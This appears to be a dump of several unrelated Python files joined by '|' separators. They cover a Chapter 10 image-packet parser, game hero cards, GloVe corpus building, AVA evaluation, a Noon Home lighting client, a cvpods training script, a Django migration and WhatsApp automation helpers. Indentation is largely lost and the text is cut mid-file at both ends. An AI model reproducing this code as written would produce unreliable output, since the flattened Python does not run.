return _COMPONENTS[name]
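# e.g. get_component("Node") is Node; unknown names raise ValueError so callers
# fail fast on a bad component name.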
|
from .util import BitFormat
from . import packet
__all__ = ('ImageF0', 'ImageF1', 'ImageF2')
class ImageMessage:
def __repr__(self):
return '<Image Segment>'
class ImageF0(packet.Packet):
"""Image data
    .. py:attribute:: length
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Less than one complete image
* 1 - One complete image
* 2 - Multiple complete images
* 3 - Multiple incomplete images
.. py:attribute:: parts
        Indicates which piece[s] of the frame are contained in the packet:
"""
csdw_format = BitFormat('''
u27 length
u1 iph
u3 sum
u3 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
            If IPH is true (see above), contains the intra-packet timestamp
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
if self.iph:
self.Message.FORMAT = BitFormat('u64 ipts')
class ImageF1(packet.Packet):
"""Still imagery
.. py:attribute:: format
* 0 - MIL-STD-2500 National Imagery Transmission Format
* 1 - JPEG File Interchange Format
        * 2 - JPEG 2000 (ISO/IEC 15444-1)
* 3 - Portable Network Graphics Format (PNG)
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image
* 1 - Contains one complete image
* 2 - Contains multiple complete images
        * 3 - Contains multiple incomplete images
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
        * 2 - Contains last segment of image
* 3 - Contains both first and last segment of image
"""
csdw_format = BitFormat('''
p23
u4 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
            If IPH is true (see above), contains the intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
class ImageF2(packet.Packet):
"""Dynamic Imagery
.. py:attribute:: format
Refer to chapter 10 standard
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image (segment)
* 1 - Contains one complete image
* 2 - Contains multiple complete images
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains last segment of image
"""
csdw_format = BitFormat('''
p21
u6 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
            If IPH is true (see above), contains the intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
|
from SDWLE.cards.base import HeroCard
from SDWLE.constants import CHARACTER_CLASS, MINION_TYPE
from SDWLE.powers import MagePower, DruidPower, HunterPower, PaladinPower, PriestPower, RoguePower,\
ShamanPower, WarlockPower, WarriorPower, JaraxxusPower, DieInsect
class Malfurion(HeroCard):
def __init__(self):
super().__init__("Malfurion Stormrage", CHARACTER_CLASS.DRUID, 30, DruidPower)
class Rexxar(HeroCard):
def __init__(self):
super().__init__("Rexxar", CHARACTER_CLASS.HUNTER, 30, HunterPower)
class Jaina(HeroCard):
def __init__(self):
super().__init__("Jaina Proudmoore", CHARACTER_CLASS.MAGE, 30, MagePower)
class Uther(HeroCard):
def __init__(self):
super().__init__("Uther the Lightbringer", CHARACTER_CLASS.PALADIN, 30, PaladinPower)
class Anduin(HeroCard):
def __init__(self):
super().__init__("Anduin Wrynn", CHARACTER_CLASS.PRIEST, 30, PriestPower)
class Valeera(HeroCard):
def __init__(self):
super().__init__("Valeera Sanguinar", CHARACTER_CLASS.ROGUE, 30, RoguePower)
class Thrall(HeroCard):
def __init__(self):
super().__init__("Thrall", CHARACTER_CLASS.SHAMAN, 30, ShamanPower)
class Guldan(HeroCard):
def __init__(self):
super().__init__("Gul'dan", CHARACTER_CLASS.WARLOCK, 30, WarlockPower)
class Garrosh(HeroCard):
def __init__(self):
super().__init__("Garrosh Hellscream", CHARACTER_CLASS.WARRIOR, 30, WarriorPower)
class Jaraxxus(HeroCard):
def __init__(self):
super().__init__("Lord Jaraxxus", CHARACTER_CLASS.WARLOCK, 15, JaraxxusPower, MINION_TYPE.DEMON,
ref_name="Lord Jarraxus (hero)")
class Ragnaros(HeroCard):
def __init__(self):
super().__init__("Ragnaros the Firelord (hero)", CHARACTER_CLASS.ALL, 8, DieInsect)
def hero_for_class(character_class):
if character_class == CHARACTER_CLASS.DRUID:
return Malfurion()
elif character_class == CHARACTER_CLASS.HUNTER:
return Rexxar()
elif character_class == CHARACTER_CLASS.MAGE:
return Jaina()
elif character_class == CHARACTER_CLASS.PRIEST:
return Anduin()
elif character_class == CHARACTER_CLASS.PALADIN:
return Uther()
elif character_class == CHARACTER_CLASS.ROGUE:
return Valeera()
elif character_class == CHARACTER_CLASS.SHAMAN:
return Thrall()
elif character_class == CHARACTER_CLASS.WARLOCK:
return Guldan()
elif character_class == CHARACTER_CLASS.WARRIOR:
return Garrosh()
else:
return Jaina()
__hero_lookup = {"Jaina": Jaina,
"Malfurion": Malfurion,
"Rexxar": Rexxar,
"Anduin": Anduin,
"Uther": Uther,
"Gul'dan": Guldan,
"Valeera": Valeera,
"Thrall": Thrall,
"Garrosh": Garrosh,
"Jaraxxus": Jaraxxus,
"Ragnaros": Ragnaros,
}
def hero_from_name(name):
return __hero_lookup[name]()
|
# Cooccurrence matrix construction tools
# for fitting the GloVe model.
import numpy as np
try:
# Python 2 compat
import cPickle as pickle
except ImportError:
import pickle
from .corpus_cython import construct_cooccurrence_matrix
class Corpus(object):
"""
Class for constructing a cooccurrence matrix
from a corpus.
    A dictionary mapping words to ids can optionally
be supplied. If left None, it will be constructed
from the corpus.
"""
def __init__(self, dictionary=None):
self.dictionary = {}
self.dictionary_supplied = False
self.matrix = None
if dictionary is not None:
self._check_dict(dictionary)
self.dictionary = dictionary
self.dictionary_supplied = True
def _check_dict(self, dictionary):
if (np.max(list(dictionary.values())) != (len(dictionary) - 1)):
raise Exception('The largest id in the dictionary '
'should be equal to its length minus one.')
if np.min(list(dictionary.values())) != 0:
raise Exception('Dictionary ids should start at zero')
def fit(self, corpus, window=10, ignore_missing=False):
"""
Perform a pass through the corpus to construct
the cooccurrence matrix.
Parameters:
- iterable of lists of strings corpus
- int window: the length of the (symmetric)
context window used for cooccurrence.
- bool ignore_missing: whether to ignore words missing from
the dictionary (if it was supplied).
Context window distances will be preserved
even if out-of-vocabulary words are
ignored.
If False, a KeyError is raised.
"""
self.matrix = construct_cooccurrence_matrix(corpus,
self.dictionary,
int(self.dictionary_supplied),
int(window),
int(ignore_missing))
def save(self, filename):
with open(filename, 'wb') as savefile:
pickle.dump((self.dictionary, self.matrix),
savefile,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, filename):
instance = cls()
with open(filename, 'rb') as savefile:
instance.dictionary, instance.matrix = pickle.load(savefile)
return instance
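# Usage sketch (illustrative; relies only on the public API above):
#   corpus = Corpus()
#   corpus.fit([['hello', 'glove'], ['hello', 'world']], window=2)
#   corpus.dictionary    # word -> id mapping built from the corpus
#   corpus.save('corpus.model')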
|
r"""Compute action detection performance for the AVA dataset.
Please send any questions about this code to the Google Group ava-dataset-users:
https://groups.google.com/forum/#!forum/ava-dataset-users
Example usage:
python -O get_ava_performance.py \
-l ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt \
-g ava_val_v2.1.csv \
-e ava_val_excluded_timestamps_v2.1.csv \
-d your_results.csv
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import defaultdict
import csv
import heapq
import logging
import pprint
import sys
import time
import numpy as np
from evaluation.ava import object_detection_evaluation
from evaluation.ava import standard_fields
def print_time(message, start):
logging.info("==> %g seconds to %s", time.time() - start, message)
def make_image_key(video_id, timestamp):
"""Returns a unique identifier for a video id & timestamp."""
return "%s,%04d" % (video_id, int(timestamp))
def read_csv(csv_file, class_whitelist=None, capacity=0):
"""Loads boxes and class labels from a CSV file in the AVA format.
CSV file format described at https://research.google.com/ava/download.html.
Args:
csv_file: A file object.
class_whitelist: If provided, boxes corresponding to (integer) class labels
not in this set are skipped.
capacity: Maximum number of labeled boxes allowed for each example.
Default is 0 where there is no limit.
Returns:
boxes: A dictionary mapping each unique image key (string) to a list of
boxes, given as coordinates [y1, x1, y2, x2].
labels: A dictionary mapping each unique image key (string) to a list of
      integer class labels, matching the corresponding box in `boxes`.
scores: A dictionary mapping each unique image key (string) to a list of
      score values, matching the corresponding label in `labels`. If
scores are not provided in the csv, then they will default to 1.0.
"""
start = time.time()
entries = defaultdict(list)
boxes = defaultdict(list)
labels = defaultdict(list)
scores = defaultdict(list)
reader = csv.reader(csv_file)
for row in reader:
    assert len(row) in [7, 8], "Wrong number of columns: " + str(row)
image_key = make_image_key(row[0], row[1])
x1, y1, x2, y2 = [float(n) for n in row[2:6]]
action_id = int(row[6])
if class_whitelist and action_id not in class_whitelist:
continue
score = 1.0
if len(row) == 8:
score = float(row[7])
if capacity < 1 or len(entries[image_key]) < capacity:
heapq.heappush(entries[image_key],
(score, action_id, y1, x1, y2, x2))
elif score > entries[image_key][0][0]:
heapq.heapreplace(entries[image_key],
(score, action_id, y1, x1, y2, x2))
for image_key in entries:
# Evaluation API assumes boxes with descending scores
entry = sorted(entries[image_key], key=lambda tup: -tup[0])
for item in entry:
score, action_id, y1, x1, y2, x2 = item
boxes[image_key].append([y1, x1, y2, x2])
labels[image_key].append(action_id)
scores[image_key].append(score)
print_time("read file " + csv_file.name, start)
return boxes, labels, scores
def read_exclusions(exclusions_file):
"""Reads a CSV file of excluded timestamps.
Args:
exclusions_file: A file object containing a csv of video-id,timestamp.
Returns:
A set of strings containing excluded image keys, e.g. "aaaaaaaaaaa,0904",
or an empty set if exclusions file is None.
"""
excluded = set()
if exclusions_file:
reader = csv.reader(exclusions_file)
for row in reader:
      assert len(row) == 2, "Expected only 2 columns, got: " + str(row)
excluded.add(make_image_key(row[0], row[1]))
return excluded
def read_labelmap(labelmap_file):
"""Reads a labelmap without the dependency on protocol buffers.
Args:
labelmap_file: A file object containing a label map protocol buffer.
Returns:
labelmap: The label map in the form used by the object_detection_evaluation
module - a list of {"id": integer, "name": classname } dicts.
class_ids: A set containing all of the valid class id integers.
"""
labelmap = []
class_ids = set()
name = ""
class_id = ""
for line in labelmap_file:
if line.startswith(" name:"):
name = line.split('"')[1]
elif line.startswith(" id:") or line.startswith(" label_id:"):
class_id = int(line.strip().split(" ")[-1])
labelmap.append({"id": class_id, "name": name})
class_ids.add(class_id)
return labelmap, class_ids
def run_evaluation(labelmap, groundtruth, detections, exclusions):
"""Runs evaluations given input files.
Args:
labelmap: file object containing map of labels to consider, in pbtxt format
groundtruth: file object
detections: file object
exclusions: file object or None.
"""
categories, class_whitelist = read_labelmap(labelmap)
logging.info("CATEGORIES (%d):\n%s", len(categories),
pprint.pformat(categories, indent=2))
excluded_keys = read_exclusions(exclusions)
pascal_evaluator = object_detection_evaluation.PascalDetectionEvaluator(
categories)
# Reads the ground truth data.
boxes, labels, _ = read_csv(groundtruth, class_whitelist, 0)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in ground truth: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_ground_truth_image_info(
image_key, {
standard_fields.InputDataFields.groundtruth_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.InputDataFields.groundtruth_classes:
np.array(labels[image_key], dtype=int),
standard_fields.InputDataFields.groundtruth_difficult:
np.zeros(len(boxes[image_key]), dtype=bool)
})
print_time("convert groundtruth", start)
# Reads detections data.
boxes, labels, scores = read_csv(detections, class_whitelist, 50)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in detections: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_detected_image_info(
image_key, {
standard_fields.DetectionResultFields.detection_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.DetectionResultFields.detection_classes:
np.array(labels[image_key], dtype=int),
standard_fields.DetectionResultFields.detection_scores:
np.array(scores[image_key], dtype=float)
})
print_time("convert detections", start)
start = time.time()
metrics = pascal_evaluator.evaluate()
print_time("run_evaluator", start)
pprint.pprint(metrics, indent=2)
def parse_arguments():
"""Parses command-line flags.
Returns:
args: a named tuple containing three file objects args.labelmap,
args.groundtruth, and args.detections.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--labelmap",
help="Filename of label map",
type=argparse.FileType("r"),
default="./ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt")
parser.add_argument(
"-g",
"--groundtruth",
default='./ava_val_v2.2.csv',
help="CSV file containing ground truth.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-d",
"--detections",
default='results.csv',
help="CSV file containing inferred action detections.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-e",
"--exclusions",
help=("Optional CSV file containing videoid,timestamp pairs to exclude from evaluation."),
type=argparse.FileType("r"),
required=False)
return parser.parse_args()
def main():
logging.basicConfig(level=logging.INFO)
args = parse_arguments()
run_evaluation(**vars(args))
if __name__ == "__main__":
main()
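# Hedged example invocation (script and file names are placeholders):
#   python ava_eval.py -l labelmap.pbtxt -g groundtruth.csv -d detections.csv -e excluded.csv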
|
from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
|
import logging
import asyncio
from asyncio import CancelledError
from aiohttp import ClientSession, WSMsgType, ClientTimeout, WSServerHandshakeError
import json
import datetime
import traceback
import typing
from .const import (
LOGIN_URL,
DEX_URL,
Guid
)
from .space import NoonSpace
from .line import NoonLine
from .entity import NoonEntity
from .scene import NoonScene
from .exceptions import (
NoonAuthenticationError,
NoonUnknownError,
NoonProtocolError,
NoonDuplicateIdError
)
_LOGGER = logging.getLogger(__name__)
class Noon(object):
"""Base object for Noon Home."""
@property
async def spaces(self) -> typing.Dict[Guid, NoonSpace]:
if self._spaces is None:
await self._refreshDevices()
return self._spaces
@property
async def lines(self) -> typing.Dict[Guid, NoonLine]:
if self._lines is None:
await self._refreshDevices()
return self._lines
@property
def session(self) -> ClientSession:
return self._session
@property
def event_stream_connected(self) -> bool:
return self._event_stream_connected
@property
def event_stream_error(self) -> str:
return self._event_stream_error
def __init__(self, session, username, password):
"""Create a PyNoone object.
:param username: Noon username
:param password: Noon password
:returns PyNoon base object
"""
# Properties
self._spaces = None
self._lines = None
self._scenes = None
self._all_entities = {}
self._endpoints = {}
self._event_stream_connected = False
self._event_stream_error = None
# Store credentials
self._username = username
self._password = password
self._token = None
self._token_expires = None
# AIOHTTP
self._session = session
self._websocket_task = None
async def authenticate(self) -> bool:
"""Authenticate with Noon and store the authentication token."""
"""Reuse token if we have one."""
if self._token is not None and self._token_expires > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return True
""" Authenticate user, and get tokens """
_LOGGER.debug("No valid token or token expired. Authenticating...")
payload = {
"email": self._username,
"password": self._password
}
async with self.session.post(LOGIN_URL, json=payload) as login_response:
parsed_response = await login_response.json()
_LOGGER.debug("Response: {}".format(parsed_response))
# Invalid response from noon
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from authentication was not a dictionary")
raise NoonProtocolError
# Single error from noon
if "error" in parsed_response.keys():
raise NoonAuthenticationError
# Errors from Noon
if parsed_response.get("errors") is not None:
_LOGGER.error("Multiple authentication errors from Noon - {}".format(parsed_response["errors"]))
raise NoonUnknownError
# Must have a token and lifetime
try:
self._token = parsed_response["token"]
self._token_expires = datetime.datetime.now() + datetime.timedelta(seconds = (parsed_response["lifetime"]-30))
_LOGGER.debug("Got token from Noon. Expires at {}".format(self._token_expires))
except KeyError:
_LOGGER.error("Failed to get token or lifetime from {}".format(parsed_response))
raise NoonUnknownError
# Get endpoints if needed
await self._refreshEndpoints()
# Success
return True
async def open_eventstream(self, event_loop=None):
"""Create a background task for the event stream."""
if event_loop is None:
_LOGGER.debug("Using main asyncio event loop")
event_loop = asyncio.get_running_loop()
assert self._websocket_task is None or self._websocket_task.cancelled(), "Already running an event stream task"
self._websocket_task = event_loop.create_task(self._internal_eventstream())
async def close_eventstream(self):
"""Close the event stream background task."""
if self._websocket_task is not None and not self._websocket_task.cancelled():
_LOGGER.debug("Canceling websocket task")
self._websocket_task.cancel()
async def _internal_eventstream(self):
"""Loop for connecting to the Noon notification stream."""
keep_looping = True
while keep_looping:
try:
await self.authenticate()
timeout = ClientTimeout(total=8, connect=20, sock_connect=20, sock_read=8)
event_stream_url = "{}/api/notifications".format(self._endpoints["notification-ws"])
_LOGGER.debug("Connecting to notification stream...")
async with self.session.ws_connect(event_stream_url, timeout=timeout, heartbeat=60, headers={"Authorization": "Token {}".format(self._token)}) as ws:
_LOGGER.debug("Connected to notification stream")
self._event_stream_connected = True
self._event_stream_error = None
async for msg in ws:
if msg.type == WSMsgType.TEXT:
_LOGGER.debug("Got websocket message: {}".format(msg.data))
parsed_data = json.loads(msg.data)
changes = parsed_data["data"].get("changes", [])
for change in changes:
await self._handle_change(change)
elif msg.type == WSMsgType.CLOSED:
_LOGGER.error("Socket closed")
raise NoonProtocolError("Notification stream closed unexpectedly")
elif msg.type == WSMsgType.ERROR:
_LOGGER.error("Websocket error")
raise NoonProtocolError("Unknown error on notification stream")
except CancelledError:
_LOGGER.debug("Loop canceled.")
self._event_stream_error = "Canceled"
keep_looping = False
except WSServerHandshakeError:
_LOGGER.error("Loop Fatal: Handshake error")
self._event_stream_error = "Handshake Error"
keep_looping = False
except Exception:
_LOGGER.exception("Loop Fatal: Generic exception during event loop")
self._event_stream_error = "Unknown exception - {}".format(traceback.format_exc())
keep_looping = False
finally:
_LOGGER.debug("Event stream is disconnected.")
self._event_stream_connected = False
async def _handle_change(self, change):
"""Process a change notification."""
guid = change.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(change))
return
affected_entity = self._all_entities.get(guid, None)
if affected_entity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, change))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affected_entity.name, change))
changed_fields = change.get("fields", [])
return await affected_entity.handle_update(changed_fields)
def get_entity(self, entity_id: Guid) -> NoonEntity:
return self._all_entities.get(entity_id, None)
async def _refreshEndpoints(self):
"""Update the noon endpoints for this account"""
if len(self._endpoints) > 0:
return
await self.authenticate()
async with self.session.get(DEX_URL, headers={
"Authorization": "Token {}".format(self._token)
}) as login_response:
parsed_response = await login_response.json()
# Must be a dictionary
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from get endpoints was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
# Store
try:
self._endpoints = parsed_response["endpoints"]
except KeyError:
_LOGGER.error("Unexpected endpoints response {}".format(parsed_response))
raise NoonUnknownError
def _registerEntity(self, entity: NoonEntity):
""" EVERYTHING """
self._all_entities[entity.guid] = entity
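        # Hedged note: the name-mismatch checks below are intentionally disabled
        # by "and False", so a duplicate GUID silently keeps the first
        # registration instead of raising NoonDuplicateIdError.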
""" SPACE """
if isinstance(entity, NoonSpace):
existingEntity = self._spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._spaces[entity.guid] = entity
""" LINE """
if isinstance(entity, NoonLine):
existingEntity = self._lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._lines[entity.guid] = entity
""" SCENE """
if isinstance(entity, NoonScene):
existingEntity = self._scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._scenes[entity.guid] = entity
async def _refreshDevices(self):
"""Load the devices (spaces/lines) on this account."""
# Reset cache
self._spaces = {}
self._scenes = {}
self._lines = {}
# Authenticate if needed
await self.authenticate()
# Load the device details
url = "{}/api/query".format(self._endpoints["query"])
headers = {
"Authorization": "Token {}".format(self._token),
"Content-Type": "application/graphql"
}
data = "{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}"
async with self.session.post(url, headers=headers, data=data) as discovery_response:
parsed_response = await discovery_response.json()
# Must be a dictionary
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from discovery was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
# Parse spaces
for space in parsed_response["spaces"]:
this_space = await NoonSpace.from_json(self, space)
_LOGGER.debug("Discovered space {}".format(this_space.name))
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Modified by BaseDetection, Inc. and its affiliates. All Rights Reserved
"""
Detection Training Script.
This scripts reads a given config file and runs the training or evaluation.
It is an entry point that is made to train standard models in cvpods.
In order to let one script support training of many models,
this script contains logic that is specific to these built-in models and therefore
may not be suitable for your own project.
For example, your research project perhaps only needs a single "evaluator".
Therefore, we recommend you use cvpods as a library and take
this file as an example of how to use the library.
You may want to write your own script with your datasets and other customizations.
"""
import logging
import os
import pickle as pkl
import sys
from collections import OrderedDict
from colorama import Fore, Style
import torch
from cvpods.checkpoint import DetectionCheckpointer
from cvpods.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch
from cvpods.evaluation import build_evaluator, verify_results
from cvpods.modeling import GeneralizedRCNNWithTTA
from cvpods.utils import comm
sys.path.insert(0, '.')
from config import config # noqa: E402
from net import build_model # noqa: E402
class Trainer(DefaultTrainer):
"""
We use the "DefaultTrainer" which contains pre-defined default logic for
standard training workflow. They may not work for you, especially if you
are working on a new research project. In that case you can use the cleaner
"SimpleTrainer", or write your own training loop. You can use
"tools/plain_train_net.py" as an example.
"""
@classmethod
def build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):
"""
Create evaluator(s) for a given dataset.
This uses the special metadata "evaluator_type" associated with each builtin dataset.
For your own dataset, you can simply create an evaluator manually in your
script and do not have to worry about the hacky if-else logic here.
"""
dump_train = config.GLOBAL.DUMP_TRAIN
return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)
@classmethod
def test_with_TTA(cls, cfg, model):
logger = logging.getLogger("cvpods.trainer")
# In the end of training, run an evaluation with TTA
# Only support some R-CNN models.
logger.info("Running inference with test-time augmentation ...")
model = GeneralizedRCNNWithTTA(cfg, model)
res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA"))
res = OrderedDict({k + "_TTA": v for k, v in res.items()})
return res
def stage_main(args, cfg, build):
cfg.merge_from_list(args.opts)
cfg, logger = default_setup(cfg, args)
model_build_func = build
"""
If you'd like to do anything fancier than the standard training logic,
consider writing your own training loop or subclassing the trainer.
"""
trainer = Trainer(cfg, model_build_func)
trainer.resume_or_load(resume=args.resume)
if args.eval_only:
DetectionCheckpointer(
trainer.model, save_dir=cfg.OUTPUT_DIR, resume=args.resume).resume_or_load(
cfg.MODEL.WEIGHTS, resume=args.resume)
res = Trainer.test(cfg, trainer.model)
if comm.is_main_process():
verify_results(cfg, res)
if cfg.TEST.AUG.ENABLED:
res.update(Trainer.test_with_TTA(cfg, trainer.model))
return res
    # Check whether the workspace has enough storage space.
    # Assume that a single dumped model is roughly 700 MB.
file_sys = os.statvfs(cfg.OUTPUT_DIR)
free_space_Gb = (file_sys.f_bfree * file_sys.f_frsize) / 2**30
eval_space_Gb = (cfg.SOLVER.LR_SCHEDULER.MAX_ITER // cfg.SOLVER.CHECKPOINT_PERIOD) * 700 / 2**10
if eval_space_Gb > free_space_Gb:
logger.warning(f"{Fore.RED}Remaining space({free_space_Gb}GB) "
f"is less than ({eval_space_Gb}GB){Style.RESET_ALL}")
if cfg.TEST.AUG.ENABLED:
trainer.register_hooks(
[hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]
)
trainer.train()
if comm.is_main_process() and cfg.MODEL.AS_PRETRAIN:
# convert last ckpt to pretrain format
convert_to_pretrained_model(
input=os.path.join(cfg.OUTPUT_DIR, "model_final.pth"),
save_path=os.path.join(cfg.OUTPUT_DIR, "model_final_pretrain_weight.pkl")
)
def convert_to_pretrained_model(input, save_path):
obj = torch.load(input, map_location="cpu")
obj = obj["model"]
newmodel = {}
for k, v in obj.items():
if not k.startswith("encoder_q.") and not k.startswith("network"):
continue
old_k = k
if k.startswith("encoder_q."):
k = k.replace("encoder_q.", "")
elif k.startswith("network"):
k = k.replace("network.", "")
print(old_k, "->", k)
newmodel[k] = v.numpy()
res = {
"model": newmodel,
"__author__": "MOCO" if k.startswith("encoder_q.") else "CLS",
"matching_heuristics": True
}
with open(save_path, "wb") as f:
pkl.dump(res, f)
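# Hedged illustration of the key renaming above (keys are invented examples):
#   "encoder_q.layer1.0.conv1.weight" -> "layer1.0.conv1.weight"  (MOCO-style)
#   "network.stem.conv1.weight"       -> "stem.conv1.weight"      (CLS-style)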
def main(args):
if isinstance(config, list):
assert isinstance(build_model, list) and len(config) == len(build_model)
for cfg, build in zip(config, build_model):
stage_main(args, cfg, build)
else:
stage_main(args, config, build_model)
if __name__ == "__main__":
args = default_argument_parser().parse_args()
if isinstance(config, list):
assert len(config) > 0
print("soft link first config in list to {}".format(config[0].OUTPUT_DIR))
config[0].link_log()
else:
print("soft link to {}".format(config.OUTPUT_DIR))
config.link_log()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
|
# Generated by Django 3.2.3 on 2021-05-17 16:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0072_alter_product_region'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='name_lt',
new_name='name',
),
]
|
__author__ = 'Alexandre Calil Martins Fonseca, github: xandao6'
# region TUTORIAL
'''
Go to region 'FOR SCRIPTING' and use the methods in your script!
EXAMPLE OF USAGE:
from wplay.pyppeteerUtils import pyppeteerConfig as pypConfig
from wplay.pyppeteerUtils import pyppeteerSearch as pypSearch
async def my_script(target):
    pages, browser = await pypConfig.configure_browser_and_load_whatsapp(pypConfig.websites['whatsapp'])
await pypSearch.search_for_target_and_get_ready_for_conversation(pages[0], target)
message = pypSearch.ask_user_for_message_breakline_mode()
await pypSearch.send_message(pages[0], message)
message2 = pypSearch.ask_user_for_message()
await pypSearch.send_message(pages[0], message2)
'''
# endregion
# region IMPORTS
from wplay.utils.helpers import whatsapp_selectors_dict
from wplay.utils import Logger
from wplay.utils.helpers import logs_path
from pyppeteer.errors import ElementHandleError
# endregion
# region FOR SCRIPTING
async def search_and_select_target(page, target, hide_groups=False):
await __open_new_chat(page)
await __type_in_new_chat_search_bar(page, target)
contact_list_elements_unchecked = await __get_contacts_elements_filtered(page, target)
group_list_elements_unchecked = await __get_groups_elements_filtered(page, target, hide_groups)
contact_titles_unchecked = await __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked)
group_titles_unchecked = await __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked)
contact_list_unchecked = __zip_contact_titles_and_elements_unchecked(
contact_titles_unchecked, contact_list_elements_unchecked)
group_list_unchecked = __zip_group_titles_and_elements_unchecked(
group_titles_unchecked, group_list_elements_unchecked)
contact_tuple = __check_contact_list(target, contact_list_unchecked)
group_tuple = __check_group_list(target, group_list_unchecked)
target_tuple = __get_target_tuple(contact_tuple, group_tuple)
__print_target_tuple(target_tuple)
target_index_choosed = __ask_user_to_choose_the_filtered_target(target_tuple)
choosed_target = __get_choosed_target(target_tuple, target_index_choosed)
await __navigate_to_target(page, choosed_target)
target_focused_title = await __get_focused_target_title(page, target)
if any(choosed_target[0] in i for i in contact_tuple):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_focused_title)
__check_target_focused_title(page, target, target_focused_title)
await __wait_for_message_area(page)
return target_focused_title
async def search_and_select_target_without_new_chat_button(page, target, hide_groups=False):
    await __type_in_chat_or_message_search(page, target)
    chats_messages_groups_elements_list = await __get_chats_messages_groups_elements(page)
    contact_name_index_tuple_list = await __get_contacts_matched_with_query(chats_messages_groups_elements_list)
    group_name_index_tuple_list = await __get_groups_matched_with_query(chats_messages_groups_elements_list, hide_groups)
    target_tuple = (contact_name_index_tuple_list, group_name_index_tuple_list)
    __print_target_tuple(target_tuple)
    target_index_chosen = __ask_user_to_choose_the_filtered_target(target_tuple)
    # chosen_target will be a tuple (a, b) such that a is the name of the target
    # and b is the index of that element in chats_messages_groups_elements_list
    chosen_target = __get_choosed_target(target_tuple, target_index_chosen)
    await __open_selected_chat(chosen_target[1], chats_messages_groups_elements_list)
target_name = chosen_target[0]
if any(chosen_target[0] in i for i in contact_name_index_tuple_list):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_name)
await __wait_for_message_area(page)
return target_name
# endregion
#region LOGGER create
logger: Logger = Logger.setup_logger('logs', logs_path / 'logs.log')
#endregion
# region SEARCH AND SELECT TARGET
async def __type_in_chat_or_message_search(page, target):
try:
print(f'Looking for: {target}')
await page.waitForSelector(
whatsapp_selectors_dict['chat_or_message_search'],
visible=True,
timeout=0
)
await page.waitFor(500)
